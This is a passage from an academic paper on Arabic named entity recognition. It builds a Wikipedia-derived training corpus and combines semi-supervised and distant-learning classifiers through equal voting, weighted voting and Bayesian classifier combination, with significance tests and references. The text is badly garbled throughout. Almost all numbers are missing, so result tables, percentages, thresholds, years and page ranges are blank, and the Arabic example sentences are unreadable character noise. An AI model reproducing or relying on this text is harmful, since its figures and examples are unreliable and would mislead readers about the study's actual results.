article’s body text (tardif et al., ). the feature set is represented by term frequency-inverse document frequency (tf-idf). in order to develop a wikipedia document classifier to categorise wikipedia documents into conll ne types, namely person, location, organisation, mis- cellaneous, or other, we use a set of , manually classified wikipedia articles that are available free online (alotaibi and lee, ). % of the , hand-classified wikipedia articles are used for train- ing, and % for evaluation. 
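a minimal sketch of this document-classification step is given below, assuming scikit-learn. the input article fields, the origin-marking suffixes and the classifier choice (a linear svm) are illustrative assumptions rather than the exact configuration used in the paper.

```python
# minimal sketch: classify wikipedia articles into ne types with
# location-suffixed bag-of-words features and tf-idf weighting.
# the article fields, suffix markers and classifier choice are assumptions.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score

def article_to_tokens(article):
    """mark tokens with their origin so category/infobox words stay distinguishable."""
    tokens = article["title"].split() + article["first_sentence"].split()
    tokens += [t + "_CAT" for cat in article["categories"] for t in cat.split()]
    tokens += [t + "_INF" for t in article["infobox"].split()]
    return " ".join(tokens)

def train_article_classifier(articles, labels):
    texts = [article_to_tokens(a) for a in articles]
    x_train, x_test, y_train, y_test = train_test_split(texts, labels, test_size=0.2)
    model = make_pipeline(TfidfVectorizer(), LinearSVC())
    model.fit(x_train, y_train)
    print("macro f1:", f1_score(y_test, model.predict(x_test), average="macro"))
    return model
```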
the wikipedia document classifier that we train performs well, achieving an f-score of %. the classifier is then used to classify all wikipedia articles. at the end of this stage, we obtain a list of pairs containing each wikipedia article and its ne type, in preparation for the next stage: developing the ne-tagged training corpus.

. . the annotation process
to begin the annotation process we identify matching terms in the article title and the first sentence and then tag the matching phrases with the ne-type of the article. the system adopts partial matching, where all corresponding words in the title and the first sentence should first be identified. then, the system annotates them and all words in between (althobaiti et al.). the next step is to transform the links between wikipedia articles into ne annotations according to the ne-type of the link target. wikipedia also contains a fair amount of nes without links. we follow the technique proposed by nothman et al., which suggests inferring additional links using the aliases for each article. thus, we compile a list of alternative titles, including anchor texts and ne redirects (i.e., the linked phrases and redirected pages that refer to ne articles). it is necessary to filter the list, however, to remove noisy alternative titles, which usually appear due to (a) one-word meaningful named entities that are ambiguous when taken out of context and (b) multi-word alternative titles that contain apposition words (e.g., 'president', 'vice minister'). to this end we use the filtering algorithm proposed by althobaiti et al. (see algorithm ).

in this algorithm a capitalisation probability measure for arabic is introduced. this involves finding the english gloss for each one-word alternative name and then computing its probability of being capitalised in the english wikipedia. in order to find the english gloss for arabic words, wikipedia arabic-to-english cross-lingual links are exploited. in case the english gloss for the arabic word cannot be found using inter-language links, an online translator is used. before translating the arabic word, a light stemmer is used to remove prefixes and conjunctions in order to acquire the translation of the word itself without its associated affixes. the capitalisation probability is computed as follows:

$pr[en] = \frac{f(en)_{iscapitalised}}{f(en)_{iscapitalised} + f(en)_{notcapitalised}}$

where $en$ is the english gloss of the alternative name, $f(en)_{iscapitalised}$ is the number of times the english gloss en is capitalised in the english wikipedia, and $f(en)_{notcapitalised}$ is the number of times the english gloss en is not capitalised in the english wikipedia. by specifying a capitalisation threshold constraint, ambiguous one-word titles are prevented from being included in the list of alternative titles. the capitalisation threshold is set to . as suggested in (althobaiti et al.). the multi-word alternative name is also omitted if any of its words belong to the list of apposition words.

algorithm : filtering alternative names
input: a set l = {l1, l2, ..., ln} of all alternative names of wikipedia articles
output: a set rl = {rl1, rl2, ..., rln} of reliable alternative names
for i ← 1 to n do
    t ← split li into tokens
    if t.size() >= 2 then
        /* multi-word name: all tokens of t must not belong to the apposition list */
        if !containAppositiveWord(t) then
            add li to the set rl
    else
        /* one-word name: keep it only if its english gloss is usually capitalised */
        lightStem ← findLightStem(li)
        englishGloss ← translate(lightStem)
        /* compute capitalisation probability for the english gloss */
        capProb ← compCapProb(englishGloss)
        if capProb > . then
            add li to the set rl

. . building the corpus
the last stage is to incorporate sentences into the final corpus. we refer to this dataset as the wikipedia-derived corpus (wdc). it contains , sentences of around million tokens. our model was then trained on the wdc corpus. in this paper we refer to this model as the dl classifier. the wdc dataset is available online (https://sites.google.com/site/mahajalthobaiti/resources). we also plan to make the models available to the research community.

classifier combination
. the case for classifier combination
in what follows we use ssl to refer to our semi-supervised classifier (see section . ) and dl to refer to our distant learning classifier (see section . ). table shows the results of both classifiers when tested on the anercorp test set (see section for details about the dataset).

table : the results of the ssl and dl classifiers on the anercorp test set.
nes       classifier   precision   recall   fβ=1
per       ssl          .           .        .
          dl           .           .        .
loc       ssl          .           .        .
          dl           .           .        .
org       ssl          .           .        .
          dl           .           .        .
overall   ssl          .           .        .
          dl           .           .        .

as is apparent in table , the ssl classifier tends to be more precise at the expense of recall.
for example, detecting ø p @q� ̄ “ferrari” and aj »ñ k“nokia” as organization names in the following sentences: also known as trigger words which help in identifying nes within text • . . . ø p @q� ̄ Ð qk ø yË @ ,ñ jk p �� k a� úΫ ñ� �ñË @ Ð y �®�k “alonso got ahead of the renault driver who prevented ferrari from ... ” • �é �® ®�Ë @ Ð aÖ �ß @ à c« @ áÓ Ð ñk yªk. aj »ñ k h. a¢ k z ag. “nokia’s speech came a day after the comple- tion of the deal” the strengths and weaknesses of the ssl and dl classifiers indicates that a classifier ensemble could perform better than its individual components. . classifier combination methods classifier combination methods are suitable when we need to make the best use of the predictions of multiple classifiers to enable higher accuracy classi- fications. dietterich ( a) reviews many methods for constructing ensembles and explains why clas- sifier combination techniques can often gain better performance than any base classifier. tulyakov et al. ( ) introduce various categories of classifier combinations according to different criteria includ- ing the type of the classifier’s output and the level at which the combinations operate. several empir- ical and theoretical studies have been conducted to compare ensemble methods such as boosting, ran- domisation, and bagging techniques (maclin and opitz, ; dietterich, b; bauer and kohavi, ). ghahramani and kim ( ) explore a gen- eral framework for a bayesian model combination that explicitly models the relationship between each classifier’s output and the unknown true label. as such, multiclass bayesian classifier combination (bcc) models are developed to combine predictions of multiple classifiers. their proposed method for bcc in the machine learning context is derived di- rectly from the method proposed in (haitovsky et al., ) for modelling disagreement between human assessors, which in turn is an extension of (dawid and skene, ). similar studies for modelling data annotation using a variety of methods are presented in (carpenter, ; cohn and specia, ). simp- son et al. ( ) present a variant of bcc in which they consider the use of a principled approximate bayesian method, variational bayes (vb), as an in- ference technique instead of using gibbs sampling. they also alter the model so as to use point values for hyper-parameters, instead of placing exponential hyper-priors over them. the following sections detail the combination methods used in this paper to combine the minimally supervised classifiers for arabic ner. . . voting voting is the most common method in classifier combination because of its simplicity and accept- able results (van halteren et al., ; van erp et al., ). each classifier is allowed to vote for the class of its choice. it is common to take the ma- jority vote, where each base classifier is given one vote and the class with the highest number of votes is chosen. in the case of a tie, when two or more classes receive the same number of votes, a random selection is taken from among the winning classes. it is useful, however, if base classifiers are distin- guished by their quality. for this purpose, weights are used to encode the importance of each base clas- sifier (van erp et al., ). equal voting assumes that all classifiers have the same quality (van halteren et al., ). weighted voting, on the other hand, gives more weight to classifiers of better quality. so, each classifier is weighted according to its overall precision, or its precision and recall on the class it suggests. 
formally, given k classifiers, a widely used combination scheme is the linear interpolation of the classifiers' class probability distributions:

$p(c \mid s_{1 \ldots K}(w)) = \sum_{k=1}^{K} p_k(c \mid s_k(w)) \cdot \lambda_k(w)$

where $p_k(c \mid s_k(w))$ is an estimation of the probability that the correct classification is c given $s_k(w)$, the class for the word w as suggested by classifier k, and $\lambda_k(w)$ is the weight that specifies the importance given to each classifier k in the combination. $p_k(c \mid s_k(w))$ is computed as follows:

$p_k(c \mid s_k(w)) = \begin{cases} 1, & \text{if } s_k(w) = c \\ 0, & \text{otherwise} \end{cases}$

for equal voting, each classifier should have the same weight (e.g., $\lambda_k(w) = 1/K$). in the case of weighted voting, the weight associated with each classifier can be computed from its precision and/or recall, as illustrated above.

. . independent bayesian classifier combination (ibcc)
using a bayesian approach to classifier combination (bcc) provides a mathematical combination framework in which many classifiers, with various distributions and training features, can be combined to provide more accurate information. this framework explicitly models the relationship between each classifier's output and the unknown true label (levenberg et al.). this section describes the bayesian approach to classifier combination we adopted in this paper, which, like the work of levenberg et al., is based on simpson et al.'s simplification of the ghahramani and kim model.

for the ith data point, the true label $t_i$ is assumed to be generated by a multinomial distribution with parameter $\delta$: $p(t_i = j \mid \delta) = \delta_j$, which models the class proportions. true labels may take values $t_i = 1 \ldots J$, where J is the number of true classes. it is also assumed that there are K base classifiers. the outputs of the classifiers are assumed to be discrete, with values $l = 1 \ldots L$, where L is the number of possible outputs. the output $c_i^{(k)}$ of classifier k is assumed to be generated by a multinomial distribution with parameters $\pi_j^{(k)}$:

$p(c_i^{(k)} = l \mid t_i = j, \pi_j^{(k)}) = \pi_{j,l}^{(k)}$

where $\pi^{(k)}$ is the confusion matrix for classifier k, which quantifies the decision-making abilities of each base classifier. as in simpson et al.'s study, we assume that the parameters $\pi_j^{(k)}$ and $\delta$ have dirichlet prior distributions with hyper-parameters $\alpha_{0,j}^{(k)} = [\alpha_{0,j1}^{(k)}, \alpha_{0,j2}^{(k)}, \ldots, \alpha_{0,jL}^{(k)}]$ and $\nu_0 = [\nu_{0,1}, \nu_{0,2}, \ldots, \nu_{0,J}]$ respectively. given the observed class labels and based on the above prior, the joint distribution over all variables for the ibcc model is

$p(\delta, \Pi, t, c \mid A_0, \nu_0) = \prod_{i=1}^{I} \Big\{ \delta_{t_i} \prod_{k=1}^{K} \pi_{t_i, c_i^{(k)}}^{(k)} \Big\}\, p(\delta \mid \nu_0)\, p(\Pi \mid A_0)$,

where $\Pi = \{\pi_j^{(k)} \mid j = 1 \ldots J,\ k = 1 \ldots K\}$ and $A_0 = \{\alpha_{0,j}^{(k)} \mid j = 1 \ldots J,\ k = 1 \ldots K\}$. the conditional probability of a test data point $t_i$ being assigned class j is given by

$p(t_i = j) = \frac{\rho_{ij}}{\sum_{y=1}^{J} \rho_{iy}}$, where $\rho_{ij} = \delta_j \prod_{k=1}^{K} \pi_{j, c_i^{(k)}}^{(k)}$.

in our implementation we used point values for $A_0$, as in (simpson et al.). the values of the hyper-parameters $A_0$ offer a natural method to include any prior knowledge: they can be regarded as pseudo-counts of prior observations, and they can be chosen to represent any prior level of uncertainty in the confusion matrices $\Pi$. our inference technique for the unknown variables ($\delta$, $\Pi$, and t) was gibbs sampling, as in (ghahramani and kim; simpson et al.). figure shows the directed graphical model for ibcc: the $c_i^{(k)}$ represent observed values, circular nodes are variables with distributions, and square nodes are variables instantiated with point values.

figure : the directed graph of ibcc, with nodes $\nu_0$, $\alpha_0^{(k)}$, $\delta$, $\pi^{(k)}$, $c_i^{(k)}$ and $t_i$, and plates over the classifiers k = 1, ..., K and the data points i = 1, ..., I.
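a compact numpy sketch of gibbs sampling for the ibcc model above is given below. the variable names mirror the notation of the model; the number of sweeps, the integer label encoding, the uniform priors and the absence of burn-in handling are illustrative assumptions, not the authors' implementation.

```python
# minimal gibbs-sampling sketch for the ibcc model described above.
# c: (I, K) array of base-classifier outputs encoded as integers 0..L-1;
# t_known: length-I array with the true label where available and -1 otherwise.
import numpy as np

def ibcc_gibbs(c, t_known, J, L, alpha0=1.0, nu0=1.0, sweeps=500, seed=0):
    rng = np.random.default_rng(seed)
    I, K = c.shape
    t = np.where(t_known >= 0, t_known, rng.integers(0, J, size=I))
    posterior = np.zeros((I, J))
    for _ in range(sweeps):                     # no burn-in handling, kept minimal
        # sample class proportions delta | t ~ dirichlet(nu0 + class counts)
        delta = rng.dirichlet(nu0 + np.bincount(t, minlength=J))
        # sample each confusion matrix pi^(k) | t, c row by row
        pi = np.empty((K, J, L))
        for k in range(K):
            for j in range(J):
                counts = np.bincount(c[t == j, k], minlength=L)
                pi[k, j] = rng.dirichlet(alpha0 + counts)
        # conditional class probabilities rho_ij = delta_j * prod_k pi^(k)_{j, c_i^(k)}
        rho = np.tile(delta, (I, 1))
        for k in range(K):
            rho *= pi[k][:, c[:, k]].T
        rho /= rho.sum(axis=1, keepdims=True)
        # resample the unknown true labels; validation points keep their label
        for i in range(I):
            t[i] = t_known[i] if t_known[i] >= 0 else rng.choice(J, p=rho[i])
        posterior += rho
    return posterior / sweeps                   # estimate of p(t_i = j)
```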
Figure : The directed graphical model for IBCC, with plates over the classifiers k = 1, ..., K and the data points i = 1, ..., I.

Data

In this section, we describe the two datasets we used:

• Validation set (NEWS + BBCNews):  % of this dataset is used to estimate the weight of each base classifier and  % is used to perform error analysis.
• Test set (ANERcorp test set): this dataset is used to evaluate the different classifier combination methods.

The validation set is composed of two datasets: NEWS and BBCNews. The NEWS set, also known as the development set, contains around  k tokens collected by Darwish ( ) from the RSS feed of the Arabic (Egypt) version of news.google.com from October  . We created the BBCNews corpus by collecting a representative sample of news from the BBC in May  . It contains around  k tokens and covers different types of news such as politics, economics, and entertainment. The ANERcorp test set makes up  % of the whole ANERcorp set. The ANERcorp set is a newswire corpus built and manually tagged especially for the Arabic NER task by Benajiba et al. ( a) and contains around  k tokens. This test set is commonly used in the Arabic NER literature to evaluate supervised classifiers (Benajiba and Rosso, ; Abdul-Hamid and Darwish, ; Abdallah et al., ; Oudah and Shaalan, ) and minimally supervised classifiers (Alotaibi and Lee, ; Althobaiti et al., ; Althobaiti et al., ), which allows us to review the performance of the combined classifiers and compare it to the performance of each base classifier.

Experimental Analysis

Experimental Setup

In the IBCC model, the validation data was used as known $t_i$ to ground the estimates of the model parameters. The hyper-parameters $\alpha_j^{(k)}$ and $\nu_j$ were set as in (Kim and Ghahramani, ; Levenberg et al., ). The initial values for the random variables were set as follows: (a) the class proportion $\delta$ was initialised to the result of counting $t_i$, and (b) the confusion matrix $\pi$ was initialised to the result of counting $t_i$ against the output of each classifier $c^{(k)}$. Gibbs sampling was run well past stability (i.e., for  iterations); stability was actually reached in approximately  iterations. All parameters required by the voting methods were specified using the validation set. We examined two different voting methods: equal voting and weighted voting. In the case of equal voting, each classifier was given an equal weight ($1/K$, where $K$ is the number of classifiers to be combined). In weighted voting, total precision was used in order to give preference to classifiers of good quality.

Results and Discussion

A Simple Baseline Combined Classifier

The proposed combined classifier simply and straightforwardly makes decisions based on the agreed decisions of the base classifiers, namely the SSL classifier and the DL classifier. That is, if the base classifiers agree on the NE type of a certain word, then it is annotated with the agreed NE type. In the case of disagreement, the word is considered not a named entity. Table  shows the results of this combined classifier, which is considered a baseline in this paper.

Table : The results of the baseline.

               Precision   Recall   Fβ=1
Person             .          .        .
Location           .          .        .
Organisation       .          .        .
Overall            .          .        .

The results of the combined classifier show very high precision, which indicates that both base classifiers are mostly accurate. The base classifiers also commit different errors, which is evident in the low recall.
The accuracy and diversity of the single classifiers are the main conditions for a combined classifier to have better accuracy than any of its components (Dietterich, a). Therefore, in the next section we consider various classifier combination methods in order to aggregate the best decisions of the SSL and DL classifiers and to improve overall performance.

Combined Classifiers: Classifier Combination Methods

The SSL and DL classifiers are trained with two different algorithms using different training data. The SSL classifier is trained on the ANERcorp training data, while the DL classifier is trained on a corpus automatically derived from Arabic Wikipedia, as explained in Sections  .  and  . . We combine the SSL and DL classifiers using the three classifier combination methods, namely equal voting, weighted voting, and IBCC. Table  shows the results of these classifier combination methods. The IBCC scheme outperforms all voting techniques and base classifiers in terms of F-score. Regarding precision, the voting techniques show the highest scores; however, the high precision is accompanied by a reduction in recall for both voting methods. The IBCC combination method also has relatively high precision compared to the precision of the base classifiers. Much better recall is registered for IBCC, but it is still low.

Table : The performances of the various combination methods.

NEs       Combination method   Precision   Recall   Fβ=1
PER       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
LOC       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
ORG       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
Overall   Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .

NEs       Base classifier      Precision   Recall   Fβ=1
Overall   SSL                      .          .        .
          DL                       .          .        .

Combined Classifiers: Restriction of the Combination Process

An error analysis of the validation set shows that  . % of the NEs were correctly detected by the semi-supervised classifier but considered not NEs by the distant learning classifier. At the same time, the distant learning classifier managed to correctly detect  . % of the NEs that were considered not NEs by the semi-supervised classifier. We also noticed that the false positive rates, i.e. the possibility of considering a word an NE when it is actually not an NE, are very low ( . % and  . % for the semi-supervised and distant learning classifiers, respectively). These low false positive rates and the high percentage of NEs that are detected and missed by the two classifiers in a mutually exclusive way can be exploited to obtain better results, more specifically to increase recall without negatively affecting precision. Therefore, we restricted the combination process to include only situations where the base classifiers agree or disagree on the NE type of a certain word. The combination process is ignored in cases where the base classifiers disagree only on detecting NEs: for example, if the base classifiers disagree on whether a certain word is an NE or not, the word is automatically considered an NE (a short sketch of this rule follows below). Figure  provides some examples that illustrate the restrictions we applied to the combination process. The annotations in the examples are based on the CoNLL annotation guidelines (Chinchor et al., ).

Figure : Examples of restricting the combination process (predictions of the SSL classifier vs. predictions of the DL classifier, showing when the combination method is applied).
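The sketch below is a minimal illustration of this restriction, assuming each base classifier emits either an NE tag (e.g., "B-PER") or "O" for a word; the helper name restricted_combine and the combine() callback are illustrative only.

```python
def restricted_combine(ssl_tag, dl_tag, combine):
    """Apply the combination method only when both classifiers detect an NE;
    if they disagree on detection, trust the detecting classifier."""
    ssl_is_ne, dl_is_ne = ssl_tag != "O", dl_tag != "O"
    if ssl_is_ne and dl_is_ne:                 # agree or disagree on the NE *type*
        return combine(ssl_tag, dl_tag)        # e.g. a voting or IBCC decision
    if ssl_is_ne != dl_is_ne:                  # disagree on *detection*
        return ssl_tag if ssl_is_ne else dl_tag   # the word is considered an NE
    return "O"                                 # both say it is not an entity

# Toy usage with a trivial "prefer SSL" combiner:
print(restricted_combine("B-PER", "B-LOC", combine=lambda a, b: a))   # -> B-PER
print(restricted_combine("O", "B-ORG", combine=lambda a, b: a))       # -> B-ORG
```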
Restricting the combination process in this way increases recall without negatively affecting precision, as seen in Table . The increase in recall makes the overall F-score for all combination methods higher than those of the base classifiers. This way of using the IBCC model results in a performance level that is superior to all of the individual classifiers and the other voting-based combined classifiers. Therefore, the IBCC model leads to a  % increase in the performance of the best base classifier, while the voting methods increase the performance by around  %- %. These results highlight the role of restricting the combination, which affects the performance of the combination methods and gives more control over how and when the predictions of the base classifiers should be combined.

Table : The performances of the various combination methods when restricting the combination process.

NEs       Combination method   Precision   Recall   Fβ=1
PER       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
LOC       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
ORG       Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .
Overall   Equal voting             .          .        .
          Weighted voting          .          .        .
          IBCC                     .          .        .

NEs       Base classifier      Precision   Recall   Fβ=1
Overall   SSL                      .          .        .
          DL                       .          .        .

Comparing Combined Classifiers: Statistical Significance of Results

We tested whether the difference in performance between the three classifier combination methods (equal voting, weighted voting, and IBCC) is significant, using two different statistical tests over the results of these combination methods on the ANERcorp test set. An alpha level of  .  was used as the significance criterion for all statistical tests. First, we ran a non-parametric sign test. The small p-value (p ≪ . ) for each pair of the three combination methods, as seen in Table , suggests that these methods are significantly different. The only comparison where no significance was found is equal voting vs. weighted voting, when we used them to combine the data without any restrictions (p = . ).

Table : The sign test results (exact p-values) for the pairwise comparisons of the combination methods.

Combination methods (without restriction)    Equal voting    Weighted voting
Weighted voting                                   .
IBCC                                            < . e-            < . e-

Combination methods (with restriction)       Equal voting    Weighted voting
Weighted voting                                   . e-
IBCC                                            < . e-              . e-

Second, we used bootstrap sampling (Efron and Tibshirani, ), which is becoming the de facto standard in NLP (Søgaard et al., ). Table  compares each pair of the three combination methods using bootstrap sampling over documents with  ,  replicates. It shows the p-values and confidence intervals of the difference between means.

Table : The bootstrap test results (p-values and CIs) for the pairwise comparisons of the combination methods.

Combination with restriction
  Comparison                           p-value    [ % CI]
  Weighted voting vs. equal voting        .       [ . ,  . ]
  IBCC vs. equal voting                   .       [ . ,  . ]
  IBCC vs. weighted voting                .       [ . ,  . ]

Combination without restriction
  Comparison                           p-value    [ % CI]
  Weighted voting vs. equal voting        .       [- . ,  . ]
  IBCC vs. equal voting                   .       [ . ,  . ]
  IBCC vs. weighted voting                .       [ . ,  . ]

The differences in performance between almost all pairs of the three combination methods are highly significant. The one exception is the comparison between equal voting and weighted voting when they are used as a combination method without restriction, which shows a non-significant difference (p-value = . , CI = - .  to  . ).
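A minimal sketch of such a bootstrap comparison is shown below, assuming per-document scores are available for the two methods being compared; the function name, the replicate count, and the toy scores are illustrative, not the exact procedure or data used here.

```python
import random

def bootstrap_diff(scores_a, scores_b, replicates=10000, seed=0):
    """Resample documents with replacement; return a one-sided p-value (fraction of
    replicates where method A does not beat B) and a 95% CI on the mean difference A - B."""
    rng = random.Random(seed)
    n, diffs = len(scores_a), []
    for _ in range(replicates):
        idx = [rng.randrange(n) for _ in range(n)]
        diffs.append(sum(scores_a[i] - scores_b[i] for i in idx) / n)
    diffs.sort()
    p_value = sum(d <= 0 for d in diffs) / replicates
    ci = (diffs[int(0.025 * replicates)], diffs[int(0.975 * replicates)])
    return p_value, ci

# Toy usage with per-document F-scores for two combination methods:
f_ibcc   = [0.72, 0.68, 0.75, 0.70, 0.74]
f_voting = [0.69, 0.66, 0.71, 0.70, 0.70]
print(bootstrap_diff(f_ibcc, f_voting))
```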
Generally, the IBCC scheme performs significantly better than the voting-based combination methods whether or not we impose restrictions on the combination process, as can be seen in Table  and Table .

Conclusion

Major advances have occurred in Arabic NER over the past decade with regard to utilising various supervised systems, exploring different features, and producing manually annotated corpora that mostly cover the standard set of NE types. More effort and time for additional manual annotation are required when expanding the set of NE types or exporting NE classifiers to new domains. This has motivated research in minimally supervised methods, such as semi-supervised learning and distant learning, but the performance of such methods is lower than that achieved by supervised methods. However, semi-supervised methods and distant learning tend to have different strengths, which suggests that better results may be obtained by combining these methods. Therefore, we trained two classifiers based on distant learning and semi-supervision techniques, and then combined them using a variety of classifier combination schemes. Our main contributions include the following:

• We presented a novel approach to Arabic NER using a combination of semi-supervised learning and distant supervision.
• We used the independent Bayesian classifier combination (IBCC) scheme for NER, and compared it to traditional voting methods.
• We introduced the classifier combination restriction as a means of controlling how and when the predictions of base classifiers should be combined.

This research demonstrated that combining the two minimal supervision approaches using various classifier combination methods leads to better results for NER. The use of IBCC improves the performance by  percentage points over the best base classifier, whereas the improvement in performance when using voting methods is only  to  percentage points. Although all combination methods result in an accurate classification, the IBCC model achieves better recall than the other traditional combination methods. Our experiments also showed how restricting the combination process can increase the recall of all the combination methods without negatively affecting precision.

The approach we proposed in this paper can easily be adapted to new NE types and different domains without the need for human intervention. In addition, there are many ways to restrict the combination process according to an application's preferences, either producing high accuracy or high recall. For example, we may obtain a highly accurate combined classifier if we do not combine the predictions of the base classifiers for a certain word and automatically consider it not an NE when one of the base classifiers considers this word not an NE.

References

Sherief Abdallah, Khaled Shaalan, and Muhammad Shoaib. . Integrating rule-based system with classification for Arabic named entity recognition. In Computational Linguistics and Intelligent Text Processing, pages – . Springer.
Samir Abdelrahman, Mohamed Elarnaoty, Marwa Magdy, and Aly Fahmy. . Integrated machine learning techniques for Arabic named entity recognition. IJCSI, : – .
Ahmed Abdul-Hamid and Kareem Darwish. . Simplified feature set for Arabic named entity recognition. In Proceedings of the Named Entities Workshop, pages – . Association for Computational Linguistics.
Steven Abney. . Semisupervised Learning for Computational Linguistics. CRC Press.
Fahd Alotaibi and Mark Lee. .
Mapping Arabic Wikipedia into the named entities taxonomy. In Proceedings of COLING : Posters, pages – , Mumbai, India, December. The COLING Organizing Committee.
Fahd Alotaibi and Mark Lee. . Automatically developing a fine-grained Arabic named entity corpus and gazetteer by utilizing Wikipedia. In IJCNLP.
Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. . A semi-supervised learning approach to Arabic named entity recognition. In Proceedings of the International Conference Recent Advances in Natural Language Processing RANLP , pages – , Hissar, Bulgaria, September. INCOMA Ltd. Shoumen, Bulgaria.
Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. . Automatic creation of Arabic named entity annotated corpus using Wikipedia. In Proceedings of the Student Research Workshop at the th Conference of the European Chapter of the Association for Computational Linguistics (EACL), pages – , Gothenburg.
Marco Baroni, Brian Murphy, Eduard Barbu, and Massimo Poesio. . Strudel: a corpus-based semantic model based on properties and types. Cognitive Science, ( ): – .
Eric Bauer and Ron Kohavi. . An empirical comparison of voting classification algorithms: bagging, boosting, and variants. Machine Learning, ( - ): – .
Yassine Benajiba and Paolo Rosso. . Arabic named entity recognition using conditional random fields. In Proc. of Workshop on HLT & NLP within the Arabic World, LREC, volume , pages – .
Yassine Benajiba, Paolo Rosso, and José Miguel Benedí Ruiz. a. ANERsys: an Arabic named entity recognition system based on maximum entropy. In Computational Linguistics and Intelligent Text Processing, pages – . Springer.
Yassine Benajiba, Paolo Rosso, and José Miguel Benedí Ruiz. b. ANERsys: an Arabic named entity recognition system based on maximum entropy. In Computational Linguistics and Intelligent Text Processing, pages – . Springer.
Yassine Benajiba, Mona Diab, Paolo Rosso, et al. . Arabic named entity recognition: an SVM-based approach. In Proceedings of Arab International Conference on Information Technology (ACIT), pages – .
Bob Carpenter. . Multilevel Bayesian models of categorical data annotation. Unpublished manuscript. Available online at http://lingpipe-blog.com/lingpipe-white-papers/, last accessed -March- .
Nancy Chinchor, Erica Brown, Lisa Ferro, and Patty Robinson. . Named entity recognition task definition. MITRE and SAIC.
Trevor Cohn and Lucia Specia. . Modelling annotator bias with multi-task Gaussian processes: an application to machine translation quality estimation. In ACL, pages – .
Kareem Darwish. . Named entity recognition using cross-lingual resources: Arabic as an example. In ACL, pages – .
Alexander Philip Dawid and Allan M. Skene. . Maximum likelihood estimation of observer error-rates using the EM algorithm. Applied Statistics, pages – .
Thomas G. Dietterich. a. Ensemble methods in machine learning. In Multiple Classifier Systems, volume  of Lecture Notes in Computer Science, pages – . Springer Berlin Heidelberg.
Thomas G. Dietterich. b. An experimental comparison of three methods for constructing ensembles of decision trees: bagging, boosting, and randomization. Machine Learning, ( ): – .
Bradley Efron and Robert J. Tibshirani. . An Introduction to the Bootstrap. CRC Press.
Ali Elsebai, Farid Meziane, and Fatma Zohra Belkredim. . A rule based persons names Arabic extraction system. Communications of the IBIMA, ( ): – .
Radu Florian, Abe Ittycheriah, Hongyan Jing, and Tong Zhang. .
Named entity recognition through classifier combination. In Proceedings of the Seventh Conference on Natural Language Learning at HLT-NAACL , pages – . Association for Computational Linguistics.
Zoubin Ghahramani and Hyun-Chul Kim. . Bayesian classifier combination. Technical report, University College London.
Y. Haitovsky, A. Smith, and Y. Liu. . Modelling disagreements among and within raters' assessments from the Bayesian point of view. Draft, presented at the Valencia meeting.
Hyun-Chul Kim and Zoubin Ghahramani. . Bayesian classifier combination. In International Conference on Artificial Intelligence and Statistics, pages – .
Abby Levenberg, Stephen Pulman, Karo Moilanen, Edwin Simpson, and Stephen Roberts. . Predicting economic indicators from web text using sentiment composition. International Journal of Computer and Communication Engineering, ( ): – .
Richard Maclin and David Opitz. . An empirical evaluation of bagging and boosting. AAAI/IAAI, : – .
Slim Mesfar. . Named entity recognition for Arabic using syntactic grammars. In Natural Language Processing and Information Systems, pages – . Springer.
Peter Mika, Massimiliano Ciaramita, Hugo Zaragoza, and Jordi Atserias. . Learning to tag and tagging to learn: a case study on Wikipedia. Volume , pages – .
Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. . Distant supervision for relation extraction without labeled data. In Proceedings of the Joint Conference of the th Annual Meeting of the ACL and the th International Joint Conference on Natural Language Processing of the AFNLP, ACL ' , pages – , Stroudsburg, PA, USA. Association for Computational Linguistics.
David Nadeau and Satoshi Sekine. . A survey of named entity recognition and classification. Lingvisticae Investigationes, ( ): – .
David Nadeau. . Semi-supervised named entity recognition: learning to recognize entity types with little supervision.
Truc-Vien T. Nguyen and Alessandro Moschitti. . End-to-end relation extraction using distant supervision from external semantic repositories. In Proceedings of the th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies: Short Papers, HLT ' , pages – , Stroudsburg, PA, USA. Association for Computational Linguistics.
Joel Nothman, Nicky Ringland, Will Radford, Tara Murphy, and James R. Curran. . Learning multilingual named entity recognition from Wikipedia. Artificial Intelligence, : – .
Mai Oudah and Khaled F. Shaalan. . A pipeline Arabic named entity recognition using a hybrid approach. In COLING, pages – .
Marius Pasca, Dekang Lin, Jeffrey Bigham, Andrei Lifchits, and Alpa Jain. . Organizing and searching the world wide web of facts, step one: the one-million fact extraction challenge. In AAAI, volume , pages – .
Alexander E. Richman and Patrick Schone. . Mining wiki resources for multilingual named entity recognition. In ACL, pages – .
Ellen Riloff and Rosie Jones. . Learning dictionaries for information extraction by multi-level bootstrapping. In AAAI, pages – .
Sriparna Saha and Asif Ekbal. . Combining multiple classifiers using vote based classifier ensemble technique for named entity recognition. Data & Knowledge Engineering, : – .
Satoshi Sekine et al. . NYU: description of the Japanese NE system used for MET- . In Proceedings of the Seventh Message Understanding Conference (MUC- ), volume .
Khaled Shaalan and Hafsa Raza. . NERA: named entity recognition for Arabic.
Journal of the American Society for Information Science and Technology, ( ): – .
Edwin Simpson, Stephen Roberts, Ioannis Psorakis, and Arfon Smith. . Dynamic Bayesian combination of multiple imperfect classifiers. In Decision Making and Imperfection, pages – . Springer.
Anders Søgaard, Anders Johannsen, Barbara Plank, Dirk Hovy, and Hector Martinez. . What's in a p-value in NLP? In Proceedings of the Eighteenth Conference on Computational Natural Language Learning (CoNLL ), pages – .
Sam Tardif, James R. Curran, and Tara Murphy. . Improved text categorisation for Wikipedia named entities. In Proceedings of the Australasian Language Technology Association Workshop, pages – .
Sergey Tulyakov, Stefan Jaeger, Venu Govindaraju, and David Doermann. . Review of classifier combination methods. In Machine Learning in Document Analysis and Recognition, pages – . Springer.
